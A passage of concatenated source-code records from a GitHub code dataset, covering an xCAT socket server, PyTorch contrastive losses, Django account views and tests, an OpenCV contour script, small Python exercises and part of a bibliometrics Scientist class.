raise\n self.address = address\n self.standalone = standalone\n self.lockfile = lockfile\n self.server = StreamServer(self._serve(), self._handle)\n\n def _serve(self):\n listener = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n listener.bind(self.address)\n listener.listen(1)\n return listener\n\n def _handle(self, sock, address):\n try:\n messager = XCATMessager(sock)\n buf = sock.recv(4)\n sz = utils.bytes2int(buf)\n buf = utils.recv_all(sock, sz)\n req = json.loads(buf)\n if not 'command' in req:\n messager.error(\"Could not find command\")\n return\n if not 'module' in req:\n messager.error(\"Please specify the request module\")\n return\n if not 'cwd' in req:\n messager.error(\"Please specify the cwd parameter\")\n return\n manager_func = xcat_manager.BaseManager.get_manager_func(\n req['module'])\n if manager_func is None:\n messager.error(\"Could not find manager for %s\" % req['module'])\n return\n nodes = req.get(\"nodes\", None)\n manager = manager_func(messager, req['cwd'], nodes, req['envs'])\n if not hasattr(manager, req['command']):\n messager.error(\"command %s is not supported\" % req['command'])\n func = getattr(manager, req['command'])\n # translate unicode string to normal string to avoid docopt error\n new_args=[]\n if req['args']:\n for a in req['args']:\n new_args.append(str(a))\n # call the function in the specified manager\n func(req['nodeinfo'], new_args)\n # after the method returns, the request should be handled\n # completely, close the socket for client\n if not self.standalone:\n sock.close()\n self.server.stop()\n os._exit(0)\n except ImportError:\n messager.error(\"OpenBMC management is using a Python framework and some dependency libraries could not be imported.\")\n print(traceback.format_exc(), file=sys.stderr)\n self.server.stop()\n os._exit(1)\n except Exception:\n print(traceback.format_exc(), file=sys.stderr)\n self.server.stop()\n os._exit(1)\n\n def keep_peer_alive(self):\n def acquire():\n fd = open(self.lockfile, \"r+\")\n fcntl.flock(fd.fileno(), fcntl.LOCK_EX)\n # if reach here, 
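# A generic sketch of the wire format this agent speaks: a 4-byte length
# header followed by UTF-8 JSON. struct stands in for the project's
# utils.int2bytes/bytes2int helpers here, so the big-endian byte order is an
# assumption rather than a copy of that module.
import json
import struct

def recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('socket closed mid-message')
        buf += chunk
    return buf

def send_msg(sock, obj):
    payload = json.dumps(obj).encode('utf-8')
    sock.sendall(struct.pack('>I', len(payload)) + payload)

def recv_msg(sock):
    size = struct.unpack('>I', recv_exact(sock, 4))[0]
    return json.loads(recv_exact(sock, size))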
parent process may exit\n            print(\"xcat process exited unexpectedly.\", file=sys.stderr)\n            self.server.stop()\n            os._exit(1)\n\n        t = threading.Thread(target=acquire)\n        t.start()\n\n    def start(self):\n        if not self.standalone:\n            self.keep_peer_alive()\n        self.server.serve_forever()\n","repo_name":"xcat2/xcat-core","sub_path":"xCAT-openbmc-py/lib/python/agent/xcatagent/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","stars":339,"dataset":"github-code","pt":"53"} +{"seq_id":"23232404274","text":"N = int(input())\nsum_left = 0\nsum_right = 0\ncurrent_number = 0\n\nfor i in range(0, N):\n    current_number = int(input())\n    sum_left += current_number\nfor i in range(0, N):\n    current_number = int(input())\n    sum_right += current_number\n\nif sum_left == sum_right:\n    print(f\"Yes, sum = {sum_left}\")\nelse:\n    print(f\"No, diff = {abs(sum_left - sum_right)}\")","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"For Loop - Lab/09_Left_and_Right_Sum2.py","file_name":"09_Left_and_Right_Sum2.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1431743059","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom utils.tensor_operator import to_device, tensor2array, force_fp32\nfrom . import atom_loss_register\nfrom ..utils import symmetric_loss_wrapper\n\n\n@atom_loss_register\n@symmetric_loss_wrapper\n@force_fp32()\ndef cdist_loss(X, Y, margin):\n    dist = torch.cdist(X, Y, p=2)\n    pos = torch.diag(dist)\n\n    bs = X.size(0)\n    mask = torch.eye(bs, device=X.device)\n    neg = (1 - mask) * dist + mask * margin\n    neg = torch.relu(margin - neg)\n    loss = torch.mean(pos) + torch.sum(neg) / bs / (bs - 1)\n    return loss\n\n\n@atom_loss_register\n@symmetric_loss_wrapper\ndef dualModalityInfoNCE_loss(X, Y, temperature, normalize=False):\n    if normalize:\n        X = F.normalize(X, dim=-1)\n        Y = F.normalize(Y, dim=-1)\n\n    criterion = nn.CrossEntropyLoss()\n    B = X.size()[0]\n    logits = torch.mm(X, Y.transpose(1, 0))  # B*B\n    logits = torch.div(logits, temperature)\n    labels = torch.arange(B).long().to(logits.device)  # shape (B,)\n\n    CL_loss = criterion(logits, labels)\n\n    return CL_loss\n\n\n@atom_loss_register\ndef infoNCE_loss(features, temperature):\n    bn, dim = features.size()\n    batch_size = bn // 2  # integer division: two views per sample\n    n_views = 2\n    labels = torch.cat([torch.arange(batch_size) for i in range(n_views)], dim=0)\n    labels = (labels.unsqueeze(0) == labels.unsqueeze(1)).float()\n    labels = to_device(labels, features.device)\n\n    features = F.normalize(features, dim=1)\n\n    similarity_matrix = torch.matmul(features, features.t())\n    # assert similarity_matrix.shape == (\n    #     n_views * batch_size, n_views * batch_size)\n    # assert similarity_matrix.shape == labels.shape\n\n    # discard the main diagonal from both: labels and similarities matrix\n    mask = torch.eye(labels.shape[0], dtype=torch.bool)\n    labels = labels[~mask].view(labels.shape[0], -1)\n    similarity_matrix = similarity_matrix[~mask].view(similarity_matrix.shape[0], -1)\n    # assert similarity_matrix.shape == labels.shape\n\n    # select and combine multiple positives\n    positives = similarity_matrix[labels.bool()].view(labels.shape[0], -1)\n\n    # select only the negatives\n    negatives = similarity_matrix[~labels.bool()].view(similarity_matrix.shape[0], -1)\n\n    logits = torch.cat([positives, negatives], dim=1)\n    labels = torch.zeros(logits.shape[0], dtype=torch.long, device=features.device)\n\n    
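# At this point in infoNCE_loss, each row of `logits` holds its positive
# similarity in column 0 followed by the negatives, so the all-zero `labels`
# mark the positives; dividing by the temperature (next line) sharpens the
# softmax before cross-entropy. Toy shapes, assuming batch_size=4 and
# n_views=2: features is (8, dim), similarity_matrix is (8, 8), and after
# masking out the diagonal, logits is (8, 7).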
logits = logits / temperature\n\n    loss = F.cross_entropy(logits, labels)\n    return loss\n","repo_name":"prokia/MIGA","sub_path":"core/loss/base/atom_loss.py","file_name":"atom_loss.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"1032587479","text":"def longestSubstringWithoutRepeatingChar(arr):\n    i, j = 0, 0\n    counts = {}  # character -> occurrences inside the current window\n    maxLen = -1\n    while j < len(arr):\n        if arr[j] not in counts:\n            counts[arr[j]] = 1\n        else:\n            counts[arr[j]] += 1\n        if len(counts) < j-i+1:\n            # shrink the window from the left until all characters are distinct\n            while len(counts) < j-i+1:\n                counts[arr[i]] -= 1\n                if counts[arr[i]] == 0:\n                    del counts[arr[i]]\n                i += 1\n        if len(counts) == j-i+1:\n            maxLen = max(maxLen, j-i+1)\n        j += 1\n    return maxLen\ns = \"aabbcc\"\nprint(longestSubstringWithoutRepeatingChar(s))","repo_name":"NIDHISH99444/InterviewPrep2022Dec21","sub_path":"SlidingWindow/7LongestSubstringWithoutRepeatingChar.py","file_name":"7LongestSubstringWithoutRepeatingChar.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13001618625","text":"from django.shortcuts import render, redirect, HttpResponseRedirect, reverse\nfrom django.http import HttpResponse\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth import login as auth_login\nfrom django.views.generic.edit import FormView\nfrom .forms import LegalAccountForm, LoginForm, AccountForm, PasswordResetForm, EditAccountForm, EditLegalAccountForm, EditUserForm\nfrom .models import Account, User\nfrom django.contrib.auth.views import PasswordResetView, PasswordResetConfirmView\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import get_template, render_to_string\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom .tokens import account_activation_token\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode \n\ndef login(request):\n    if request.user.is_authenticated:\n        return HttpResponseRedirect(reverse('home'))\n    form = LoginForm()\n    success = None\n    if request.META.get('HTTP_REFERER') == request.build_absolute_uri('/auth/reset/Mw/set-password/'):\n        success = True\n    if request.method == 'POST':\n        form = LoginForm(data=request.POST)\n        if form.is_valid():\n            auth_login(request, form.get_user())\n            return redirect('home')\n        else:\n            print(form.errors)\n    context = {\n        'form':form,\n        'success':success,\n    }\n    return render(request, 'pages/login.html', context)\n\ndef register(request):\n    if request.user.is_authenticated:\n        return HttpResponseRedirect(reverse('home'))\n    normal_form = AccountForm()\n    legal_form = LegalAccountForm()\n    success = None\n\n    if 'submit-legal' in request.POST:\n        legal_form = LegalAccountForm(request.POST)\n        print(request.POST)\n        if legal_form.is_valid():\n            user = legal_form.save()\n            activation_email(request, user, legal_form.cleaned_data['email'])\n            success = True\n        print(legal_form.errors)\n    if 'submit-normal' in request.POST:\n        normal_form = AccountForm(request.POST)\n        if normal_form.is_valid():\n            user = normal_form.save()\n            activation_email(request, user, normal_form.cleaned_data['email'])\n            success = True\n        print(normal_form.errors)\n\n    context = {\n        'normal_form':normal_form,\n        'legal_form':legal_form,\n        'success':success,\n    }\n\n    return render(request, 
'pages/registration.html', context)\n\n\ndef activation_email(request, user, email):\n    current_site = get_current_site(request)\n    subject = 'Activate your account.'\n    content = {\n        'user':user,\n        'domain': current_site.domain,\n        'uid':urlsafe_base64_encode(force_bytes(user.pk)),\n        'token':account_activation_token.make_token(user),\n    }\n    text_content = render_to_string('pages/email_template_registration_confirmation.html', content)\n    htmly = get_template('pages/email_template_registration_confirmation.html')\n\n    html_content = htmly.render(content)\n    msg = EmailMultiAlternatives(subject, text_content, 'kristian.petrov@pytek.bg', [email])\n    msg.attach_alternative(html_content, \"text/html\")\n    print(msg)\n    msg.send()\n\n\ndef activate(request, uidb64, token):\n    try:\n        uid = force_text(urlsafe_base64_decode(uidb64))\n        user = User.objects.get(pk=uid)\n    except (TypeError, ValueError, OverflowError, User.DoesNotExist):\n        user = None\n    if user is not None and account_activation_token.check_token(user, token):\n        user.is_active = True\n        user.save()\n        return redirect('home')\n    else:\n        return HttpResponse('Activation link is invalid!')\n\n\n@login_required\ndef logout(request):\n    auth_logout(request)\n    return redirect('login')\n\n@login_required\ndef myprofile_normal(request):\n    if request.user.is_legal == True:\n        return redirect('my-profile-legal')\n    user = Account.objects.get(user=request.user)\n\n    user_form = EditUserForm(user=request.user, initial={'username':user.user.username})\n    account_form = EditAccountForm(instance=user, initial={\n        'name': user.name,\n        'email': user.user.email,\n        'phone': user.phone,\n        'club_card': user.club_card,\n        'adress': user.adress,\n        'city': user.city,\n        'region': user.region,\n        'zip_code': user.zip_code\n    })\n    success = None\n    if \"change-user\" in request.POST:\n        user_form = EditUserForm(user=request.user,data=request.POST)\n        if user_form.is_valid():\n            user_form.save()\n            update_session_auth_hash(request, user_form.user)\n            success = 'user-change'\n\n    elif 'change-personal' in request.POST:\n        account_form = EditAccountForm(request.POST, instance=user, )\n        if account_form.is_valid():\n            account_form.save()\n            success = 'personal-change'\n\n    context = {\n        'success':success,\n        'user_form':user_form,\n        'account_form':account_form,\n    }\n    return render(request, 'pages/my-profile.html', context)\n\n\n@login_required\ndef myprofile_legal(request):\n    if request.user.is_normal == True:\n        return redirect('my-profile-normal')\n    # fetch the Account like myprofile_normal does; without it the form\n    # initials below have no user object to read from\n    user = Account.objects.get(user=request.user)\n    # initialize success up front so an invalid form cannot leave it unbound\n    success = None\n    user_form = EditUserForm(user=request.user, initial={'username':user.user.username})\n    legal_form = EditLegalAccountForm(instance=user, initial={\n        'name': user.name,\n        'email': user.user.email,\n        'phone': user.phone,\n        'club_card': user.club_card,\n        'adress': user.adress,\n        'city': user.city,\n        'region': user.region,\n        'zip_code': user.zip_code,\n        'mol': user.mol,\n        'eik': user.eik,\n        'dds_number': user.dds_number,\n        'tax_address': user.tax_address,\n        'delivery_adress': user.delivery_adress,\n    })\n    if \"change-user\" in request.POST:\n        user_form = EditUserForm(user=request.user,data=request.POST)\n        if user_form.is_valid():\n            user_form.save()\n            update_session_auth_hash(request, user_form.user)\n            success = 'user-change'\n    elif 'change-personal' in request.POST:\n        legal_form = EditLegalAccountForm(request.POST, instance=user, )\n        if legal_form.is_valid():\n            legal_form.save()\n            success = 'personal-change'\n    context = {\n        
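# Hedged sketch of the URL side of this activation flow: the uidb64/token
# pair built in activation_email has to be routed back into activate(). The
# pattern and the 'activate' route name are assumptions for illustration,
# not copied from this project's urls.py.
from django.urls import path
from . import views

urlpatterns = [
    path('activate/<uidb64>/<token>/', views.activate, name='activate'),
]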
'success':success,\n 'user_form':user_form,\n 'legal_form':legal_form,\n }\n return render(request, 'pages/my-profile.html', context)\n\n\nclass ExtendPasswordResetView(PasswordResetView):\n success = None\n def get_context_data(self, **kwargs):\n context = super(ExtendPasswordResetView, self).get_context_data(**kwargs)\n context['success'] = self.success\n return context\n\n","repo_name":"KikoIsHere/Django-store","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75154782248","text":"# 1. Create a child class Car that will inherit all\n# of the variables and methods of Vehicle class?\n\n\nclass Vehicle():\n def vdetails(self,model,type,regno):\n self.model=model\n self.type=type\n self.regno=regno\n print(self.model,self.type,self.regno)\nclass Car(Vehicle):\n def cdetails(self,brand,price,year):\n self.brand=brand\n self.price=price\n self.year=year\n print(\"Brand :\",self.brand)\n print(\"price :\",self.price)\n print(\"Year :\",self.year)\n print(self.model, \"reg no\", self.regno)\n\n\nca=Car()\nca.vdetails(\"civic\",\"car\",\"KL45P4563\")\nca.cdetails(\"honda\",1236547,2018)\n\n\n","repo_name":"krishnanunni-pr/Pyrhon-Django","sub_path":"Exam2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36762014716","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\n\nclass ViewTests(TestCase):\n\n def test_index(self):\n response = self.client.get(reverse('index'))\n assert response.status_code == 200\n assert response.context['headline']\n\n\nclass ErrorPageTests(TestCase):\n \n def test_404(self):\n response = self.client.get(reverse('404'))\n assert response.status_code == 404\n assert response.context['error_code']\n\n def test_500(self):\n response = self.client.get(reverse('500'))\n assert response.status_code == 500\n assert response.context['error_code']","repo_name":"aaronlelevier/django-payasyougo","sub_path":"payg/payg/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72567414567","text":"import cv2\nimport numpy as np\n#import argparse\ndef get_gray(img):# grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n return gray\n\ndef get_blurred(img):# blur\n gray = get_gray(img)\n blurred = cv2.GaussianBlur(gray,(7,7),0)\n \n return blurred\n\ndef get_binary(img):# binarize\n blur = get_blurred(img)\n ret,binary = cv2.threshold(blur,127,255,cv2.THRESH_BINARY)\n \n return binary\ndef get_contours(img):# get contours\n binary = get_binary(img)\n contours,hierachy = cv2.findContours(binary,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_NONE)\n \n return contours\ndef draw_contours(img):# draw contours\n \n contours = get_contours(img)\n cv2.drawContours(img,contours,-1,(0,0,255),3)\n \n return None\n\n\ndef all_contour_X_Y(img):# return the X,Y values of all contours\n \n contours = get_contours(img)\n cv2.drawContours(img, contours, -1, (0, 0, 255), 3)\n\n return img\n\n\n\n\n \n\"\"\" lefttext = 'L'+str(Num+1)\n cv2.putText(im, lefttext, (leftmost), cv2.FONT_HERSHEY_DUPLEX,1, (0, 255, 255), 1, cv2.LINE_AA)\n print (leftmost)# show point and check \n \"\"\"\n\"\"\"\n print (centerX)\n print (centerY)\n \n print (\"X=\",leftY[0]/(-1*mRB[0]))\n print ('left 
point ',left_point)\n print ('bottom point ',bottom_point)\n print ('right point ',right_point)\n print( 'mRb' ,mRB) #把numpy轉換成list\n print('mLB',mLB)\n \"\"\"\n # cv2.imshow('123',binary)\n \n #cv2.waitKey()\n#im = cv2.imread('2object.JPG')\nim = cv2.imread('photo1.png')\nim = cv2.resize(im, (1000, 1000), interpolation=cv2.INTER_CUBIC)\ngray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray,(13,13),0)\nret,binary = cv2.threshold(blurred,127,255,cv2.THRESH_BINARY)\nlow_threshold = 1\nhigh_threshold = 10\nedges = cv2.Canny(binary, low_threshold, high_threshold)\nkernel = np.ones((5,5), np.uint8)\ndilation = cv2.dilate(edges, kernel, iterations = 1)\nerosion = cv2.erode(dilation, kernel, iterations = 1)\ncontours,hierachy = cv2.findContours(erosion,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_NONE)\n#cv2.drawContours(im,contours,-1,(0,0,255),3)\ncnt_count = []\n#cnt_count_index = cnt_count -1\ncenterX =[]\ncenterY =[]\nfor cnt in range(len(contours)):\n epsilon = 0.01 * cv2.arcLength(contours[cnt], True)\n approx = cv2.approxPolyDP(contours[cnt], epsilon, True)\n #print(len(approx))\n area = cv2.contourArea(contours[cnt])\n if( area >1000):\n print('輪廓號=',cnt,'角點數=', len(approx))\n cv2.drawContours(im, contours[cnt], -1, (255, 255, 255), 3)\n M = cv2.moments(contours[cnt])\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n # print(area)\n cnt_count.append(cnt)\n centerX.append(cX)\n centerY.append(cY)\n #cnt_count = cnt_count + 1\n text = str(cnt)\n cv2.putText(im, text, (cX + 5, cY), cv2.FONT_HERSHEY_DUPLEX, 1, (0, 255, 255), 1, cv2.LINE_AA)\n cv2.circle(im, (cX, cY), 10, (1, 227, 254), -1)\n\n\nleft_point = [] #define for save 4 most point\nright_point = []\ntop_point = []\nbottom_point = []\n##############################################\n\nmRB=[]\nmLB=[]\nfor Num in range(len(cnt_count)):\n cnt = contours[cnt_count[Num]]\n leftmost = tuple(cnt[cnt[:,:,0].argmin()][0])\n rightmost = tuple(cnt[cnt[:,:,0].argmax()][0])\n topmost = tuple(cnt[cnt[:,:,1].argmin()][0])\n bottommost = tuple(cnt[cnt[:,:,1].argmax()][0])\n ## get 4 most point \n cv2.circle(im,leftmost,10,[0,90,255],-1)\n cv2.circle(im,topmost,10,[0,90,255],-1)\n cv2.circle(im,rightmost,10,[0,90,255],-1)\n cv2.circle(im,bottommost,10,[0,90,255],-1)\n ## draw 4 most point \n left_point.append(leftmost)\n right_point.append(rightmost)\n top_point.append(topmost)\n bottom_point.append(bottommost)\n ## tuple type change to list type\n npleft = np.array(left_point)\n npright = np.array(right_point)\n #nptop = np.array(top_point)\n npbottom = np.array(bottom_point)\n ## change list to np.array\n leftX = list(npleft [ : , 0 ] )\n rightX= list(npright [ : , 0 ] )\n #topX = list(nptop [ : , 0 ] )\n bottomX=list(npbottom [ : , 0 ] )\n leftY=list(npleft [ : , 1 ] )\n rightY=list(npright [ : , 1 ] )\n #topY=list(nptop [ : , 1 ] )\n bottomY=list(npbottom [ : , 1 ] )\n mRB.append((bottomY[Num]-rightY[Num])/(bottomX[Num]-rightX[Num]))\n mLB.append((bottomY[Num]-leftY[Num])/(bottomX[Num]-leftX[Num]))\n X_position=leftY[0]/(-1*mRB[0])\n \"\"\"\nprint (centerX)\nprint (centerY)\n \nprint (\"X=\",leftY[0]/(-1*mRB[0]))\nprint ('left point ',left_point)\nprint ('bottom point ',bottom_point)\nprint ('right point ',right_point)\nprint( 'mRb' ,mRB) #把numpy轉換成list\nprint('mLB',mLB)\n\"\"\"\ncv2.imshow('edges',edges)\ncv2.imshow('im',im)\ncv2.imshow('bin',binary)\n 
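\n# The centroids drawn above come from the contour's image moments:\n#   cX = M10 / M00, cY = M01 / M00   (M00 is the contour area).\n# The four extreme points are found by indexing the contour array, e.g.\n#   leftmost = tuple(cnt[cnt[:, :, 0].argmin()][0])   # point with smallest x\n# and mRB / mLB hold the bottom-right and bottom-left edge slopes (dy/dx).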
\ncv2.waitKey()","repo_name":"harry123180/opencv_find_objects","sub_path":"GMTCV/GMTCV.py","file_name":"GMTCV.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11133020886","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Michael E. Rose <michael.ernst.rose@gmail.com>\n\"\"\"Super class to represent a scientist.\"\"\"\n\nfrom warnings import warn\n\nfrom pybliometrics.scopus import AbstractRetrieval, AffiliationRetrieval\nfrom pybliometrics.scopus.exception import Scopus404Error\n\nfrom sosia.establishing import connect_database, DEFAULT_DATABASE\nfrom sosia.processing import add_source_names, base_query, count_citations,\\\n extract_authors, find_main_affiliation, get_authors, get_main_field,\\\n maybe_add_source_names, read_fields_sources_list\nfrom sosia.utils import accepts\n\n\nclass Scientist(object):\n @property\n def active_year(self):\n \"\"\"The scientist's most recent year with publication(s) before\n provided year (which may be the same).\n \"\"\"\n return self._active_year\n\n @active_year.setter\n @accepts(int)\n def active_year(self, val):\n self._active_year = val\n\n @property\n def affiliation_country(self):\n \"\"\"The current country of the affiliation defined in affiliation_id.\"\"\"\n return self._affiliation_country\n\n @affiliation_country.setter\n @accepts(str)\n def affiliation_country(self, val):\n self._affiliation_country = val\n\n @property\n def affiliation_id(self):\n \"\"\"The affiliation ID (as string) of the scientist's most frequent\n affiliation in or before the active year.\n \"\"\"\n return self._affiliation_id\n\n @affiliation_id.setter\n @accepts(str)\n def affiliation_id(self, val):\n self._affiliation_id = val\n\n @property\n def affiliation_name(self):\n \"\"\"The current name of the affiliation defined in affiliation_id.\"\"\"\n return self._affiliation_name\n\n @affiliation_name.setter\n @accepts(str)\n def affiliation_name(self, val):\n self._affiliation_name = val\n\n @property\n def affiliation_type(self):\n \"\"\"The current type of the affiliation defined in affiliation_id.\"\"\"\n return self._affiliation_type\n\n @affiliation_type.setter\n @accepts(str)\n def affiliation_type(self, val):\n self.affiliation_type = val\n\n @property\n def citations(self):\n \"\"\"The citations of the scientist until the provided year.\"\"\"\n return self._citations\n\n @citations.setter\n @accepts(int)\n def citations(self, val):\n self._citations = val\n\n @property\n def citations_period(self):\n \"\"\"The citations of the scientist during the given period.\"\"\"\n return self._citations_period\n\n @citations_period.setter\n @accepts(int)\n def citations_period(self, val):\n self._citations_period = val\n\n @property\n def coauthors(self):\n \"\"\"Set of coauthors of the scientist on all publications until the\n provided year.\n \"\"\"\n return self._coauthors\n\n @coauthors.setter\n @accepts((set, list, tuple))\n def coauthors(self, val):\n self._coauthors = val\n\n @property\n def coauthors_period(self):\n \"\"\"Set of coauthors of the scientist on all publications during the\n given period.\n \"\"\"\n return self._coauthors_period\n\n @coauthors_period.setter\n @accepts((set, list, tuple))\n def coauthors_period(self, val):\n self._coauthors_period = val\n\n @property\n def fields(self):\n \"\"\"The fields of the scientist until the provided year, estimated from\n the sources (journals, books, etc.) 
she published in.\n \"\"\"\n return self._fields\n\n @fields.setter\n @accepts((set, list, tuple))\n def fields(self, val):\n self._fields = val\n\n @property\n def first_year(self):\n \"\"\"The scientist's year of first publication.\"\"\"\n return self._first_year\n\n @first_year.setter\n @accepts(int)\n def first_year(self, val):\n self._first_year = val\n\n @property\n def first_name(self):\n \"\"\"The scientist's first name.\"\"\"\n return self._first_name\n\n @first_name.setter\n @accepts(str)\n def first_name(self, val):\n self._first_name = val\n\n @property\n def main_field(self):\n \"\"\"The scientist's main field of research, as tuple in\n the form (ASJC code, general category).\n\n The main field is the field with the most publications, provided it\n is not Multidisciplinary (ASJC code 1000). In case of an equal number\n of publications, preference is given to non-general fields (those\n whose ASJC ends on a digit other than 0).\n \"\"\"\n return self._main_field\n\n @main_field.setter\n def main_field(self, val):\n if not isinstance(val, tuple) or len(val) != 2:\n raise Exception(\"Value must be a two-element tuple.\")\n self._main_field = val\n\n @property\n def name(self):\n \"\"\"The scientist's complete name.\"\"\"\n return self._name\n\n @name.setter\n @accepts(str)\n def name(self, val):\n self._name = val\n\n @property\n def language(self):\n \"\"\"The language(s) of the scientist published in.\"\"\"\n return self._language\n\n @language.setter\n @accepts(str)\n def language(self, val):\n self._language = val\n\n @property\n def publications(self):\n \"\"\"List of the scientists' publications.\"\"\"\n return self._publications\n\n @publications.setter\n @accepts((set, list, tuple))\n def publications(self, val):\n self._publications = val\n\n @property\n def publications_period(self):\n \"\"\"The publications of the scientist published during\n the given period.\n \"\"\"\n return self._publications_period\n\n @publications_period.setter\n @accepts((set, list, tuple))\n def publications_period(self, val):\n self._publications_period = val\n\n @property\n def sources(self):\n \"\"\"The Scopus IDs of sources (journals, books) in which the\n scientist published in.\n \"\"\"\n return self._sources\n\n @sources.setter\n @accepts((list, tuple))\n def sources(self, val):\n self._sources = maybe_add_source_names(val, self.source_names)\n\n @property\n def surname(self):\n \"\"\"The scientist's surname.\"\"\"\n return self._surname\n\n @surname.setter\n @accepts(str)\n def surname(self, val):\n self._surname = val\n\n @property\n def subjects(self):\n \"\"\"The subject areas of the scientist's publications.\"\"\"\n return self._subjects\n\n @subjects.setter\n @accepts((set, list, tuple))\n def subjects(self, val):\n self._subjects = val\n\n def __init__(self, identifier, year, refresh=False, period=None, eids=None,\n sql_fname=None):\n \"\"\"Class to represent a scientist.\n\n Parameters\n ----------\n identifier : list of int\n List of Scopus Author IDs of the scientist.\n\n year : str or numeric\n Year for which characteristics should be defined.\n\n refresh : boolean or int (optional, default=False)\n Whether to refresh cached results (if they exist) or not. If int\n is passed, results will be refreshed if they are older than\n that value in number of days.\n\n eids : list (optional, default=None)\n A list of scopus EIDs of the publications of the scientist. 
If\n it is provided, the scientist's properties are set based on these\n publications, instead of the list of publications obtained from\n the Scopus Author ID(s).\n\n period: int (optional, default=None)\n In additional starting x years prior to the treatment year,\n which is also used to compute characteristics in the treatment\n year.\n\n sql_fname : str (optional or pathlib.Path(), default=None)\n The path of the SQLite database to connect to. If None will\n default to `~/.cache/sosia/main.sqlite`.\n\n Raises\n ------\n Exception\n When there are no publications for the author until the\n provided year.\n \"\"\"\n self.identifier = identifier\n self.year = int(year)\n if not sql_fname:\n sql_fname = DEFAULT_DATABASE\n self.sql_conn = connect_database(sql_fname)\n\n # Read mapping of fields to sources\n fields, info = read_fields_sources_list()\n self.field_source = fields\n self.source_info = info\n source_names = self.source_info.set_index(\"source_id\")[\"title\"].to_dict()\n self.source_names = source_names\n\n # Load list of publications\n if eids:\n q = f\"EID({' OR '.join(eids)})\"\n else:\n q = f\"AU-ID({') OR AU-ID('.join([str(i) for i in identifier])})\"\n integrity_fields = [\"eid\", \"author_ids\", \"coverDate\", \"source_id\"]\n res = base_query(\"docs\", q, refresh, fields=integrity_fields)\n self._publications = [p for p in res if int(p.coverDate[:4]) <= year]\n if not len(self._publications):\n text = \"No publications found for author \"\\\n f\"{'-'.join([str(i) for i in identifier])} until {year}\"\n raise Exception(text)\n self._eids = eids or [p.eid for p in self._publications]\n\n # First year of publication\n pub_years = [p.coverDate[:4] for p in self._publications]\n self._first_year = int(min(pub_years))\n self._period_year = self.year - (period or (self.year+1)) + 1\n if self._period_year < self._first_year:\n self._period_year = 0\n\n # Count of citations\n search_ids = eids or identifier\n self._citations = count_citations(search_ids, self.year+1, identifier)\n\n # Coauthors\n self._coauthors = set(extract_authors(self._publications)) - set(identifier)\n\n # Period counts simply set to total if period is or goes back to None\n if self._period_year:\n pubs = [p for p in self._publications if\n self._period_year <= int(p.coverDate[:4]) <= year]\n self._publications_period = pubs\n if not len(self._publications_period):\n text = \"No publications found for author \"\\\n f\"{'-'.join([str(i) for i in identifier])} until \"\\\n f\"{year} in a {self._period_year}-years period\"\n raise Exception(text)\n eids_period = [p.eid for p in self._publications_period]\n n_cits = count_citations(eids_period, self.year+1, identifier)\n self._citations_period = n_cits\n self._coauthors_period = set(extract_authors(self._publications_period))\n self._coauthors_period -= set(identifier)\n else:\n self._coauthors_period = None\n self._publications_period = None\n self._citations_period = None\n\n # Author search information\n source_ids = set([int(p.source_id) for p in self._publications\n if p.source_id])\n self._sources = add_source_names(source_ids, self.source_names)\n self._active_year = int(max(pub_years))\n mask = fields[\"source_id\"].isin(source_ids)\n self._fields = fields[mask][\"asjc\"].astype(int).tolist()\n self._main_field = get_main_field(self._fields)\n if not self._main_field[0]:\n text = \"Not possible to determine research field(s) of \"\\\n \"researcher. 
